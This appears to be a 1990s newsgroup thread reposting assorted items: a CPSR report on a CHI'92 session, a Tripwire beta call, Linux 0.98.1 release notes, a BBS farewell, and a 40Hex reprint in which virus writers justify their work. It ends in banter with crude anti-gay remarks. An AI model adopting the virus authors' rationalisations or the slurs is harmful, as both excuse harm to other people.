how to find out. They decided that the session should be an
opportunity for people to share ideas on how computer professionals,
their employers, and their professional societies can help address
social problems of the sort that led to the riots. Jeff proposed that
to facilitate the capture and sharing of ideas, session attendees be
asked to submit ideas on paper as well as presenting them verbally.
CPSR volunteered to collect and compile the responses and issue a
report back to the attendees. Later that night, he created a form for
action-ideas, labeled "Constructive Responses to Events in L.A. and
Elsewhere," and made about 60 copies to cover the expected audience.
The next morning, at the opening plenary session, Jim Miller announced
the special session. This was the first that the approximately 2500
attendees at CHI had heard of it.
At the announced time, despite the late notice and the conflict with
lunch, approximately 300 people showed up. Student volunteers quickly
went to make more copies of the "Constructive Responses..." form. Ben
Shneiderman expressed his delight at the number of people who had come
and opened the session, describing his feelings about the riots,
reading Chris Borgman's e-mail message, and giving the intent of the
session. Prof. Borgman then spoke, elaborating on her message and
giving her ideas about what people might do. She was followed by Jeff
Johnson, who talked about growing up in South Central L.A., what it is
like for his relatives who live there now, and about CPSR and some of its
programs.
Members of the audience were then invited to the microphone to share
their ideas about what can be done to resolve social inequities. At
first, people were hesitant to speak, but within fifteen minutes or so
there were more people waiting to speak than there was time for. Some
people described volunteer work they do, some named organizations they
support, some talked about what companies do or should do, and some
talked about what various government bodies should be, but aren't, doing.
Beyond CHI'92
One hundred and ten members of the audience wrote suggestions on the
forms and turned them in. After the conference, CPSR began the process
of compiling the responses and producing the promised report. We found
volunteers to put the responses on-line. We created an e-mail
distribution list consisting of respondents who had provided e-mail
addresses. We took a quick pass through the data, to see if it
contained ideas worth publishing and sharing. It did.
On the basis of our initial look at the responses, the report began to
take shape in our minds. We didn't think it would suffice to simply
list all of the ideas that the session attendees had written. A quick
query sent to the e-mail list confirmed this: session participants
didn't want the raw data or even lightly-digested data; they wanted a
well-digested, well-organized guide to social action, a resource
booklet that goes beyond what people put on their response forms. Not
everyone has been a volunteer or activist, and even those of us who
have can benefit from a complete guidebook on how to make a positive
contribution to society.
Producing such a comprehensive report presented CPSR with a challenge,
for it would require a significant amount of work. For instance, many
respondents mentioned organizations, but it was up to us to provide
contact addresses. We also found some suggestions to be out-of-date,
e.g., organizations that have changed policies. The research necessary
to produce such a report in the months following CHI'92 exceeds what
CPSR's small staff and volunteer-base can deliver. To produce the full
report would require funding to allow us to pay for some of the labor.
We made some initial efforts to get funding, so far without success.
Nonetheless, we were committed to producing a timely report for the
CHI'92 session attendees. With encouragement from Ben Shneiderman, the
two of us decided to write a brief version of the report for SIGCHI
Bulletin. Hopefully, this brief initial report will help attract
funding for a full report.
This report is therefore intended to be the first deliverable of a
possible new CPSR project that would, if funded, provide computer
professionals with information and guidance on how to become "part of
the solution" to pressing social problems. Depending upon funding,
subsequent deliverables may include:
- a moderated e-mail discussion list on social involvement,
- an e-mail archive/server for information on social involvement,
- the aforementioned booklet: "A Guide to Social Action" for
computer professionals, suitable for companies to distribute to
employees, containing an overview of the ways to get involved, a
categorized list of ideas, a directory of organizations, some success
examples, with a sprinkling of interesting quotes from attendees of the
CHI'92 special session.
- a clearinghouse service to help computer professionals and
companies down the road toward social involvement.
In this initial report, we chose to focus on a few of the
most-commonly-suggested ideas, rather than present a shallow overview
of all of them. A more complete list will have to wait until the
booklet. We begin with some comments on what we have learned from this
exercise, then summarize a few of the suggestions, and conclude.
What have we learned from this?
"Tell me how I can help." -- a CHI'92 attendee.
Despite the stereotype of the apolitical, work-obsessed nerd, computer
professionals do care about what goes on in the world. Many are
already involved in volunteer projects, political action, and
critically examining the impact of their work. More importantly, many
more are looking for ways to get involved. The King riots really shook
up a lot of people.
The respondents see potential in themselves, their companies, and their
professional associations, but are concerned that social issues often
get lost in the shuffle of busy people and companies.
CHI conference attendees may not be representative of computer
professionals in general. Their professional focus on the interaction
between people and machines may make them more likely to be concerned
about social issues. However, CPSR members nationwide -- who are not
predominantly CHI members -- have been proving for over a decade that a
computer career and interest in social issues are not mutually exclusive.
There is no shortage of good ideas about how to get involved. The
hundred and ten respondents in the CPSR-CHI special session have
provided a first glimpse, but our feeling is that many more good ideas
remain to be suggested.
Many individuals, organizations, and companies are already doing things
that we can learn from. We needn't design from scratch.
Summary of Responses
"Education is the single most effective and powerful way to change
the situation in a permanent way." -- a CHI'92 attendee.
Our respondents overwhelmingly saw education as fundamental. They
believe that individuals, companies, professional societies, and
various levels of government could be doing much more to support
education than they now are. For example:
- Individuals can tutor disadvantaged kids, teach computer courses or
run computer labs in schools, and speak in schools about their company
and their work.
- Companies can adopt a school, donate equipment and software, and
establish programs in which students visit the workplace to learn what
computer professionals do and what skills they need.
- Professional societies can provide scholarships for high school
kids, encourage individuals and companies to develop education
applications of computer technology, and advocate greater public
funding of education.
Many respondents suggested that individuals and companies donate new
and used computer equipment to schools, community centers, and
non-profit organizations. However, some pointed out that giving
antiquated, unreliable, or inappropriate equipment is almost worse than
unhelpful, in that it can drain valuable time and energy from the
important work that these organizations do. Accordingly, many
non-profits will not accept equipment for which they can no longer find
software, documentation, and maintenance support. To help insure that
donated equipment is effectively used, computer professionals can
donate time and expertise. Otherwise, donated equipment may just sit in a
corner.
Not surprisingly, volunteerism is strongly advocated by our
respondents. Some of their suggestions are:
- Individuals can volunteer in computer labs, get involved with a
organizations that link volunteers with non-profit groups (e.g.,
CompuMentor), or even teach reading in an urban library. A frequent
comment was that literacy is more important than computer literacy.
- Companies can encourage volunteerism by helping match willing
employees with worthy organizations, by allowing employees to share
their skills on company time, and by honoring employees' volunteer efforts.
- Professional societies can encourage volunteerism among
professionals by developing mentor programs in which members work with
urban youth, and by developing computer curricula that professionals
can take into volunteer teaching situations.
"I read to primary students one-half hour per week. I get more out of
that time than the kids, but their focus on me tells me they are
getting a lot out of my time also." -- a CHI'92 attendee.
Several respondents who are involved in volunteer work noted that
volunteering has value far beyond that of the actual work that
volunteers do. It helps build much-needed understanding and trust
between ethnic and socioeconomic groups. It also is beneficial to the
volunteers themselves: they gain teaching experience, social skills,
and a broader perspective on the society in which they live, and often
have fun while doing it.
Computer professionals have learned that access to on-line
communication and information services is a powerful tool for their own
education, communication, and activism. We found that many of them
believe that on-line access would be just as empowering for the public
at large. Middle-class Americans are already beginning to get on-line,
but individuals, companies, and professional societies can make an
extra effort to assure that the poor are not cut out of the loop.
Individuals, companies, and professional societies can help put
communities on-line, as has been done in Berkeley (Community Memory
Project) and Santa Monica (Public Education Network). Such networks
can facilitate communication and discussion not only with other
citizens of a local community, but, depending on how they are connected
to larger networks, with information service providers and even elected
representatives.
"Companies can actively recruit blacks and other minorities. I have
been at CHI for 2 1/2 days and have seen only two blacks with CHI
name tags." -- a CHI'92 attendee.
More of a commitment to affirmative action in hiring and promotion is
seen as a major way in which companies can help overcome social
inequities. This means making an extra effort to find qualified
minorities and women to fill jobs, and, when candidates are equally
qualified (i.e., the difference in their estimated ability to perform
the job is less than the margin of error of the assessment process),
giving the benefit of the doubt to minorities and women. Some
respondents suggested, for example, that companies hold outreach
activities in poor communities to find potential employees.
The respondents recommended awards as a way to encourage computer
companies, academic research projects, and individuals to get involved.
Each year, CPSR recognizes a computer scientist who, in addition to
making important contributions to the field, has demonstrated an
ongoing commitment to working for social change. (ACM activist and IBM
researcher Barbara Simons is CPSR's 1992 Norbert Wiener Award winner.)
Many respondents suggested that SIGCHI or ACM offer an award for
companies that demonstrate a similar commitment through community
projects, encouraging employee volunteerism, or other good works.
The CHI conference itself emerged as an important potential focus of
social action work. Respondents recommended that CHI organizers seek
ways to have a positive impact upon the host community. Local students
-- high-school and college -- could be given tours of exhibits or
scholarships to attend the conference. Equipment used at the
conference could be donated to local schools and organizations.
Respondents also suggested paper and poster sessions devoted to
applying technology to social problems or to understanding social
issues related to computer technology.
"What's underneath are not wounds, but faults -- lines of fracture, of
discontinuity, in society, which periodically relieve their stress in
these violent ways. What can we do about that?" -- a CHI'92 attendee.
Although our respondents provided a wealth of ideas for how we, as
computer professionals and concerned citizens, can offer our time and
skills for the betterment of society, a number of them acknowledged
that charity, volunteering, and technology alone cannot solve political
and social problems. Closing the gap between rich and poor, educated
and illiterate, empowered and disenfranchised will require changes in
basic priorities at the local, state, national, and international
levels. Accordingly, many respondents recommended attempting to
influence the political process, either individually, through
professional associations, or through organizations like CPSR.
Conclusions
"Thanks for the noontime meeting on Tuesday! It was motivating to see
such a strong response." -- a CHI'92 attendee.
"Thank you, thank you, thank you for organizing this forum and bringing
some heart and spirit into this cold, albeit exciting, environment.
Onwards and upwards, I'm with you all the way!" -- a CHI'92 attendee.
"What a wonderful experience to find a humanistic island at a
professional conference!" -- a CHI'92 attendee.
The unexpectedly large response to the noontime session at CHI'92 was
extremely gratifying. Also gratifying is the degree of concern that
members of the CHI community have about social inequities and the
seriousness with which they addressed themselves to overcoming them.
Hopefully, with this report as inspiration, many computer professionals
will begin to take action.
"I'll go back and start asking questions in my company." -- a CHI'92
attendee.
The foregoing has only scratched the surface of the ideas that emerged
from the CHI'92 social issues session. As described above, CPSR hopes
to expand this report into a widely-circulated Social Action Guide, and
eventually provide on-line services to help computer professionals take
action.
To learn more about Computer Professionals for Social Responsibility,
or to get involved in the preparation of the full Social Action Guide,
contact cp...@csli.stanford.edu.
References
Shneiderman, B. "Socially Responsible Computing I: A Call to Action
Following the L.A. Riots" SIGCHI Bulletin, July, 1992, 24(3), pages 14-15.
------------------------------
From: ge...@mentor.cc.purdue.edu (Gene Kim)
Date: Fri, 9 Oct 1992 09:02:40 GMT
Subject: Article 6--Beta testers needed for security tool
Announcing the pending availability of
Tripwire: A Unix File Integrity Checker
This message is being posted to various newsgroups and mailing
lists to gather a group of beta-testers for a new security tool called
Tripwire. Tripwire was written by Gene Kim, currently at Purdue
University, under the direction of Professor Gene Spafford.
Tripwire should be of significant interest to system
administrators concerned about timely detection of system file
tampering on their Unix hosts.
Goal of Tripwire:
=================
With the advent of increasingly sophisticated and subtle
account break-ins on Unix systems, the need for tools to aid the
detection of unauthorized modification of files becomes clear.
Tripwire is a tool that aids system administrators and users in
monitoring a designated set of files for any changes. Used with
system files on a regular basis, Tripwire can notify system
administrators of corrupted or tampered files, so damage control
measures can be taken in a timely manner.
Tripwire is a system file integrity checker, a utility that
compares a designated set of files and directories against
information stored in a previously generated database. Any
differences are flagged and logged, and optionally, a user is
notified through mail. When run against system files on a
regular basis, changes in critical system files would be spotted
at the next time-interval when Tripwire is run, so damage
control measures may be implemented immediately. With
Tripwire, system administrators can conclude with a high degree
of certainty that a given set of files remain untouched from
unauthorized modifications, provided the program and database are
appropriately protected (e.g., stored on read-only disk).
Tripwire uses message digest algorithms (cryptographic
checksums) to detect changes in a hard-to-spoof manner. This
should be able to detect significant changes to critical files,
including those caused by insertion of backdoors or viruses. It
also monitors changes to file permissions, modification times,
and other significant changes to inodes as selected by the system
administrator on a per-file/directory basis.
What we need:
=============
As of this writing, Tripwire runs successfully on both BSD
and System V variants of Unix. Among the operating systems
Tripwire has run on are:
SunOS 5.x (SVR4)
SunOS 4.x (BSD 4.3)
Dynix 3.x (BSD 4.2)
Compiling Tripwire should be as simple as editing the config.h
file to set the appropriate #defines, and typing 'make'.
A pool of beta-testers is needed to ensure that Tripwire
works predictably on a wide variety of systems. Of particular
interest are system administrators using the following operating
systems:
AIX
AUX
BSD4.4
HP/UX
Mach
NextOS
OSF/1
SVR3.x
Ultrix
Unicos
Xenix
System III
Versions 6, 7, 8, & 9 :-)
other versions we didn't list
A config.h file allows you to tailor Tripwire around your
system specifics, such as the locations of system utilities (like
sort and diff), and desired lookup pathnames to your Tripwire
database files.
Possible porting trouble-spots are generally restricted to
dirent(S5)/direct(BSD) funkiness and #defines that changed for
POSIX compliance (such as those in <sys/types.h> for stat.st_mode).
Hopefully the process of beta-testing will highlight any
problems before any widely-released distribution. It is also
hoped that reasonable system defaults for a wide variety of
systems can be gathered from a diverse set of beta-testers.
This would allow useful plug-and-play builds for the majority of
Tripwire users.
What you'd get as a beta-tester:
================================
The entire source to Tripwire, manual pages, a README, and
the Tripwire design document.
What you'd need to do:
======================
You will need to install the code on your system and run
it. You will need to report back any bugfixes, enhancements,
optimizations or other code-diddling that you believe useful. If
you build a configuration file for a new system, you will need
to send this back. You will have to collect some performance
data. You will need to provide some honest, critical feedback on
utility, clarity, documentation, etc.
You will need to do all this by about October 21.
Are you interested?
===================
If so, please fill out the form at the end of this message, and
send it to (ge...@mentor.cc.purdue.edu). We will only take two or
three respondents for each system type for the beta test.
Please allow some time for processing and selection of
beta-testers. I promise to reply to all requests as
expeditiously as possible.
A formal release of Tripwire is planned for sometime in
November. Watch this space for details!
Gene Kim
September 4, 1992
===============================================================================
Name:
Email address:
System configuration:
machine type
operating system
version
Site information: (completely optional)
type of site (ie: university, corporate, military, etc...)
comments on machine security
(ie: numerous break-in attempts on our dialback servers,
repeated intrusions through network, etc...)
===============================================================================
------------------------------
From: Linus Torvalds <torv...@kruuna.helsinki.fi>
Date: Mon Oct 12 08:50
Subject: Linux 0.98.1 Information
finger torv...@kruuna.helsinki.fi
Free UN*X for the 386
The current version of linux is a 0.98.1, released 92.10.04. There are
various rootdisks that work with the newer versions, although some of
them have problems. A new SLS release is expected soonish, using either
a 0.97.pl6 or 0.98.1 kernel release.
0.98.1 supports X11r5 and the new gcc-2.1 (and newer) libraries with
multiple shared libs - as well as any old binaries (except the 0.12
version of gdb which used the older ptrace() interface). It also
contains support for debugging (core-dumping and attach/detach) as well
as profiling: use gcc-2.2.2d for full utilization of all these features.
Linux can be gotten by anonymous ftp from 'nic.funet.fi' (128.214.6.100)
in the directory '/pub/OS/Linux'. This directory structure contains all
the linux OS- and library-sources, and enough binaries to get going. To
install linux you still need to know something about unices: it's
relatively straightforward to install, but the documentation sucks raw
eggs, and people with no previous unix experience are going to get very
confused.
There are now a lot of other sites keeping linux archives. The main
ones (as well as the above-mentioned nic.funet.fi) are:
tsx-11.mit.edu (18.172.1.2):
directory /pub/linux
sunsite.unc.edu (152.2.22.81):
directory /pub/Linux
(and many additional sites: there are now sites in the uk, japan etc
that carry linux, but I have lost count)
There is also a mailing list set up 'Linux-a...@niksula.hut.fi'.
To join, mail a request to 'Linux-activ...@niksula.hut.fi'.
It's no use mailing me: I have no actual contact with the mailing-list
(other than being on it, naturally).
There is also a newsgroup that contain linux-related questions and
information: comp.os.linux.
Mail me for more info:
Linus Torvalds (torv...@kruuna.Helsinki.FI)
Pietarinkatu 2 A 2
00140 Helsinki
Finland
0.98.1 has mainly minor bug-fixes
0.98 has these features:
- tcp/ip in the standard kernel sources.
- corrected serial startup checkh~g and setserial ioctl
- core-dumping corrections
- various minor fixes
0.97.pl6 has these new features:
- corrected named pipe problem in pl5
- dynamic tty queues (no NR_PTY limit etc). Patches by tytso
- corrected SCSI codes. Patches by Eric
0.97.pl5 has these features:
- corrected *MAJOR* problem with [f]truncate() system calls
- swapoff()/wait4() system calls
- corrected some race-conditions in the minix fs
- major mm rewrite: 3GB virtual process size, faster swapping
- filesystem error reporting corrections
- minor bugfixes
0.97 has these major new things relative to 0.96
- select() through the VFS routines
- easily installable IRQ's
- bus-mouse driver
- msdos filesystem (alpha)
- extended filesystem (alpha)
- serial line changes (faster, changeable irq's etc)
- dynamic buffer-cache
- new and improved SCSI drivers
------------------------------
From: Chris Cappuccio <chris%aot...@mcnnet.mi.org>
Subject: Article 8--Fixed Problems With The aotd Mailserver
Date: 10-16-92
Ok, well after I got my computer connected with UUCP (I'm still not a
registered system but soon I expect to register with the local UUCP stuff
and also get a domain name in mi.org) I tried to subscribe to the aotd list
with my account on my machine (aotnet) but I couldin't. It turned out, because
we put some more security from people using the mailing list, that mike
also accidentaly changed the list name. Well this is fixed now. To subscribe to
Art of Technology Digest, do *exactly* this:
mail mail...@batpad.lgb.ca.us
Leave the Subject: line blank
Put this in the text of your message: SUBSCRIBE aotd
and you will be put on the mailing list. You should wait 1-24 hours for a
response. I am not using my computer as the mailserver because I only have a
2400 baud (or bps, whatever you like) modem and no mailserver software. Oh,
one more thing, you can get back issues of AoT-D from wuarchive.wustl.edu
under directory: /pub/aot/. Enjoy!
------------------------------
**********************************
End of Art of Technology Digest #6
--
Chris Cappuccio - Art of Technology Digest - chris%aot...@mcnnet.mi.org
--
Si
Smaug
Spies is shutting down because the time has come. I've been running it for
about 7 years, ever since I was a freshman attending college in upstate new
york. It's survived through 4 moves, and was run in NY, MA, CA and
Switzerland. I have really, honestly enjoyed providing the service, and I
still feel very strongly about the need to provide such a service at no
cost. Information isn't only for those who pay for it. Systems like
Netcom, uunet, portal, the well, world, btr, CAT-TALK, zorch, and any of the
other 90 systems listed in this months NIXPUB offer close to the same
service as spies did, and often charge up to $30/month for the privilege.
When I first got involved in computers and modems, back in 1976, BBSs were
100% hobbyist driven. They were a meeting place for experimenters,
tinker-ers, enthusiasts and learners. When I first started to see the
decline of such systems, I envisioned a hobbyist spirit that could be best
described as "Spies in the wire". With the advent of SHAREWARE (in 1976
days, if a enthusiast developed a neato program he would place it in the
public domain, source code and everything) things took a turn. Basically,
shareware is driven by greed. You see, the authors of shareware programs
had a problem: They were money motivated. BUT, they wanted it all. They
didn't write their programs for the hobby, for the hack. They wrote them
for the explicit purpose of making a profit. That's fine. But some clown
(who will remain nameless, but us oldtimers know who it is) had the
brilliant idea that he could market his program for a profit, and not have
to suffer the costs of a normal distribution. In other words, SHAREWARE
authors don't have the expense of distributing their software via normal
channels. But the cost doesn't disappear. The cost has been moved to
systems like this one, who must flip the bill of the harddisk storage for
there shareware programs, the telephone lines (sometimes more than one), the
modems, electricity -- everything for the profit of the shareware authors.
They were using our systems as a free distribution channel, and we weren't
getting anything out of it!
I had two goals when I started spies: Re-kindle the spirit of hobbyist
computing, which was destroyed by profit-minded individuals. And to show
people that there is an alternative to leech-style files-oriented BBSs. The
first SPIES BBS ran a BBS package called E-MX. E-MX was written entirely in
Z80 assemply language for CP/M machines, by a very nice fellow in Vancouver,
BC. It had no files section. It had a good e-mail system, and a REALLY
fast message systems. There was never a pause or hesitation when switching
message areas for browsing user profiles. E-MX was elegant and small. 17k,
if I remember correctly. I never forgot how well it was deisnged, and it
had a great influence on my programming style.
After E-MX, I found Citadel, the original 2.10 by Cynbe (I've forgotton my
Citadel lore). I worked alot on the code, and finally got it to run
multi-user under MP/M in a 48k TPA! It ran for 3 years on an Altos machine
while I was in college (in fact, I think Andy Meyer <moebius> still has that
machine).
When I graduated, I left a Kaypro 10 CP/M machine to my college, and the
psychology department ran a BBS as a social interaction experiment.
Interestingly, Thom Brown, head of the psychology dept. became dean of the
college about 4 years ago, and just recently shut down UCC, the BBS I had
left them. Ran for close to 6 years after I graduated.
When I graduated I worked for a robotics company in Geneve, Switzerland. It
was tough being an American in a foreign country, so I spent alot of my time
hacking together Citasim/VAX. A "Citadel Simulator for the DEC Vax
mini-computer". Written in Fortran, no less. Since I was out of touch with
the Citadel development happening in the US, I started the design from
scratch, using what I learned doing the MP/M port. The goal was to have a
multi-user citadel, and emulate the user interface, but nothing else. (ie,
don't adopt any of the data structures or networking).
When I returned to NY, I ported Citasim/VAX to the WICAT 68000 mini computer
(I had done some consulting for WICAT, and they had given me one of their
machines in payment). There was born Citasim/WICAT, which I was running for
about 3 years, and eventually burdened RObert and Carmen with their own
WICAT systems, and shrugged off the responsability of buggy code.
Since I had sold my last Wicat system, I was kinda forced to go Unix, if I
wanted to stay multi-user. I found a good deal on an Itegrated Solution
68020 BSD system, and ran a MUD (spymud) alongside Citasim. Soon, I learned
that mud had captured most of the local interest (except for a few
hold-offs, Ult- I salute you - you were right) and I worked on a scheme to
have both a BBS and a mud run on the same system. That's when I switched
from Citasim to waffle. Tom Dell worked with me and got a version of Waffle
running NNTP under unix. Very nice. I remember first looking at the manual
for waffle, and saying "Shit, maybe all my shareware hatred was wrong", but
then I remembered that I hadn't downloaded waffle form a BBS, so I was
saved.
What I learned when I first ran Waffle is that I lost most of the userbase I
had cultivated when running Citasim. No more GREAT conversations.
Everything about waffle was usenet or files oriented, and my users were
mostly mud-heads at the time.
In order to stick with my ethic, I weasled an internet connection, trashed
my corrupt (in the spiritual sense) mud, and offered internet muds for my
users who needed the fix, and IRC for my users who remembered the rgeat days
of Citasim CHATTER at 3am.
Almost worked. I think I satisfied about 40% of the old Citasim users, 50%
of the local usenet freaks, 20% new IRC-happy folks, and about 20% of the
mud-heads. The happy mediocracy I had become.
It just didn't sit well. I had lost my focus. The enjoyment I sucked from
all the systems I ever ran really came from the custon software that I
wrote, nothing else. Neat hacks that pleased the users. With Waffle,
there's not much to do. It wasn't mine, and I really became a lousy SYSOP,
and a cranky programmer.
So. That's the story. From E-MX to Waffle, with the same motto: "Spies in
the wire, in the spirit of hobbyist computing"...
I'd like to take the time to say that I REALLY, REALLY enjoyed running this
system for you guys, and the messages I have received in mail and on the
forums has been terrific! It's good to see that the system wasn't just
THERE, it really seems to have made a difference. I'd like to thank Carmen,
RObert, Ult, Cindy, Hagbard, monaq, Rich, Panther, and the others who were
there from the beginning, and really helped to make SPIES a memeorable
place. The good times and the bad times changed the way I think about many
things, but most importantly, they remind me of how much can really be
accomplished with a stupid computer and modem.
Take care, and stay in the spirit...
--
SYSTEM 0PERATOR/Ducati pilot/Geek
Post: 21 of 25
Subject: Yup, I still have it!
From: moebius (moebius)
Comment: Sell the kids for food.
Date: Wed, 30 Oct 91 09:58:44 PST
...yes, I still have the Altos that arubin ran E-MX and eventually
Citadel on in Chappaqua, NY. As a matter of fact, I thought I was
the one who turned Andy on to Citadel (wasn't I?!)...
--
Si
bORDERS
kick ass man keep up the killer posts!
FŪčéßĨTë§ Ī§ęĮTõŪĪ
You know that it is going to be the end of the world when spammers find a
way to send spam by picking up ICQ numbers and sending them that way. [Look
of fear] Hopefully, Mirabilis will already have a way to combat that when
it happens, though.
FŪčéßĨTë§ Ī§ęĮTõŪĪ
Harlequin
On Fri, 13 Mar 1998 01:27:29 -0500, undo wrote:
>nyarl-tep wrote:
>> now borders you have a problem with gays?
>> how bout hackers who are gay?
>> i know plenty
>> tell you what
>> that worm you call a dick between you legs does not make you a man
>
>each other's dicks. So, since you say that you are a man, I deduce that
>that means that you are "the man" in your relationship.
Eh? Penises are often mentioned by men, particularly in insults. Just
read some of the flames in this NG.
I can't see any reason that nyarl-tep would have for lying. Not that
sex or sexuality are really relevant here in the first place.
H.
Harlequin
On Thu, 12 Mar 1998 21:51:44 GMT, Tech33 wrote:
>On Thu, 12 Mar 1998 07:22:59 -0500, bORDERS <no-...@juno.com> wrote:
>>We don't care if your queer so don't bring it up.
>>
>>nyarl-tep wrote:
>>> is there a problem with being gay?
>>> i live in a lesiban commune
>>> you want to tell me to my face there is a problem with gays?
>>> i think not cause from the safety of your keyboard you may say what you
>>> wish but in real life you would smile and wish no offence
>>
>Please pay attention to whom you are replying. Nyarl-tep was asking
>that question because of a smartassed comment by Brian.
>That said, nyarl could have just stopped with the question. Although,
>knowing a bit more about her is nice in case we ever have to figure
>out whether she's a Senator or not. ;c)
Personally, I like to know a bit of background information about the
people I interact with. I find that I can better relate to them if I'm
aware of other dimensions of their lives and personalities. This isn't
a place for detailed biographies, but a snippet of personal info here
and there is interesting.
H.
Harlequin
On Fri, 13 Mar 1998 01:29:12 -0500, undo wrote:
>nyarl-tep wrote:
>> shall we?
>> lesbian means no men in side that pussy
>> if you think 200 lb leather jacket wearing motocycle driving ex-state cop
>> clam lapping 50 yr old women are your idea of a "harum" then help yourself
>> to a come on
...
>
>Baaaaby!!! I'm on my way. I love women who do wood work.
There's been a thread about this in another NG recently. Why do so
many heterosexual men fantasise about lesbians? Do they fail to accept
that some people really don't have any interest in sexual relations
with members of the opposite sex?
Off-topic, I know, but it's one of those things that I puzzle about.
H.
Bluefish
Nice post!
Who's the author?
--
Bluefish!
Icq: 611251
ealliance at hotmail.com
bluefish at rodrun.com
http://11a.home.ml.org
http://bluefish.home.ml.org
Proud member of the #SkAS#:
Skuld Appreciation Society - the Goddess of Debuggers!
#SkAS#: http://www.luc.ac.be/~ef00/skas
Tech33
On Sun, 15 Mar 1998 07:29:58 GMT, qui...@bigfoot.com (Harlequin)
wrote:
>On Thu, 12 Mar 1998 21:51:44 GMT, Tech33 wrote:
<SNIP>
>>e pay attention to whom you are replying. Nyarl-tep was asking
>>that question because of a smartassed comment by Brian.
>>That said, nyarl could have just stopped with the question. Although,
>>knowing a bit more about her is nice in case we ever have to figure
>>out whether she's a Senator or not. ;c)
>
>Personally, I like to know a bit of background information about the
>people I interact with. I find that I can better relate to them if I'm
>aware of other dimensions of their lives and personalities. This isn't
>a place for detailed biographies, but a snippet of personal info here
>and there is interesting.
>
>H.
I agree wholeheartedly. So, that said:
1. What's your shoe size?
2. Do you like jam or jelly better?
3. Are you a dog lover, or a cat lover?
4. Are you a fan of Elvis? or the Beatles?
Please, to know these things is to know the real inner person. :c)
j/k
Tech33
Si_Druid
He who does not help, hinders.
--
40Hex Number 5 Volume 2 Issue 1 File 004
Forty Hex 5
Presents
An Alliance Interview with
John McAfee + Jon Dvorak
and
Hellraiser, Garbageheap, DecimatoR,
Count Zero, CRoW MeiSTeR, Instigator,
Demogorgon, Dark Angel, Night Crawler,
VenoM, Time Lord, Darkman.
On Feb. 2nd of 1992, an alliance was run with members of PHALCON/SKISM,
NuKE, and Ex-RABiD. We started the conference by trying to call Patti
Hoffman, who had a shit fit, and denied being the author of VSUM. Nice
of her to insult our intelligence. But anyways, we then called McAfee,
who was surprisingly a nice guy. He was interested in what we had to say.
Some of the topics covered were which viruses we had written, what types
of viri they were(i.e. MemRes, Stealth...). Another important topic
covered the Bob Ross Virus which an associate of McAfee had misnamed the
Beta Virus(it was first spread on a false version of BNU(1.90Beta)).
On the following day, we started a second alliance, this time involving
Count Zero, CRoW MeiSTeR, Dark Angel, Demogorgon, Garbageheap(moi!),
Hellraiser, Instigator, Night Crawler and Time Lord. Also in the
conference were John Markoff(New York Times), Michael Alexander(Computer
World), and John McAfee. A variety of topics were covered, I won't go into
specifics here, because in a future issue we will have a full transcript,
and in this issue we will have the article from the Feb. 10,1992 Vol.XXVI
No. 6 issue of COMPUTERWORLD.
---------------------------------------------------------------------------
CHALLENGE, NOTORIETY CITED AS IMPETUS FOR VIRUS DEVELOPERS(*Catchy title*)
By: Michael Alexander/CW STAFF
What motivates a programmer to write a virus? The thrill, declared
Hell Raiser,(* that is supposed to be Hellraiser *) a self-styled virus
author and a member of Phalcon/Skism, a group of about a dozen computer
hackers scattered across North America.
In an unusual telephone conference call to COMPUTERWORLD last week, 10
callers who said they were members of Phalcon/Skism claimed to be
responsible for writing several of the viruses now on the
loose.(* CLAIMED?!?!?!! Well, I suppose that he couldnt know if we were the
real McCoy *)
To protect their identities, the callers used such handles as Garbage
Heap(* Grabbin' top billin'! *), Nightcrawler, Demogorgon, Dark Angel, and
Time Lord. They said their ages range from 15 to 23 years old, although
COMPUTERWORLD could not independantly verify their identities.
GETTING ATTENTION
-----------------
The virus authors, as they called themselves, said they arranged the
teleconference to air their side of the story, and to talk about their
unorthadox and contradictory brand of computer ethics. (* Well... close,
we were real bored... of course, who wants to talk to bored virus
authors... *) "For the most part, virus authors are seen as a lot more
malicious than we actually are," Garbage Heap said.
His compatriots said they write viruses mainly for the thrill but
also for the challenge and the status it brings within the computer
underground. The group said it is not interested in doing harm, and
seldom creates viruses that are deliberately designed to cause damage.
"It's sort of like graffiti - getting our name across - and damage
happens in the process," he claimed.(* Hellraiser *)
As an example of the type of virus they write, the group took credit
for writing the Bob Ross Virus, named after the painter of the same name on
who hosts a show on Public Broadcasting Service.
"What it does is infect files and randomly displays 'Bobisms,' which
are messages Bob Ross would say," Hell Raiser said. "It doesn't format
the hard drive or do any damage."
However, other alleged members of Phalcon/Skism later admitted to
writing viruses that are clearly intended to damage or destroy programs
and data.(* Hellraiser again... *)
The callers contended that they are virus "authors," not virus
"spreaders," and that they are not responsible for the problems their
creations cause.
"The main difference is that an author may write a virus and may even
upload that virus to a virus board, a [bulletin Board system] oriented to
virus programmers and spreaders," one virus author explained.
"People, like a disgruntled employee who may have a gripe with
someone else, download it and spread it that way," this virus author said.
NOT LAWBREAKERS
---------------
The virus authors also pointed out that since the act of writing a
virus is not prohibited by law, they should not be viewed as criminals.
The callers claimed that even if the group stopped writing viruses,
the number of infections would not decline. The problem of viruses has
grown so large that new viruses have no impact overall, one said.
"Our effect is fairly little," he asserted.
The callers said that they have been writing viruses for about a
year, and would probably continue for at least another year. Eventually,
they hope to find jobs as full time programmers, several said.
There is no way to verify the callers' claims. However, many of the
monikers the callers used, as well as the name "Phalcon/Skism," have shown
up in perhaps as many as half - about 100 - of the viruses to appear
in the past six or seven months, said John McAfee, president of McAfee
Associates, an antivirus software publisher based in Santa Clara,Calif.
The quality of the viruses is "mediocre," Mcafee said. (* Cant win
'em all can we, John? *)
---------------------------------------------------------------------------
My thoughts on the article was that it was neutral, Mr. Alexander could
have easily ripped us apart. We didnt expect to come out looking like
heros, so why should we bitch. Next month prepare for the official
transcript of the interview. Then we can truly establish what was said.
-)GHeap
--
Si
Smokebowl
Actually I have alreadygotten spam over ICQ
574
In article <350c0e5c...@news.infi.net>, camp...@citizenet.com
says...
2. Jelly
3. Both, but currently have no dogs....just three cats
4. Neither, but my tastes range from Mozart to Metallica.
That should help you know me better ;)
Tech33
On Sun, 15 Mar 1998 17:26:49 GMT, camp...@citizenet.com (Tech33)
wrote:
<snip>
>
>I agree wholeheartedly. So, that said:
>
>1. What's your shoe size?
>2. Do you like jam or jelly better?
>3. Are you a dog lover, or a cat lover?
>4. Are you a fan of Elvis? or the Beatles?
>
>Please, to know these things is to know the real inner person. :c)
>j/k
>Tech33
Since someone actually posted an answer, here's mine:
11 1/2
jam
cats
neither either, I got that from a movie. I like classical, and
synthesized. I've tried to write my own, off of a Yamaha midi, but I
suck at it. Such is life.
Tech33
Jennifer Martino
574 wrote:
>
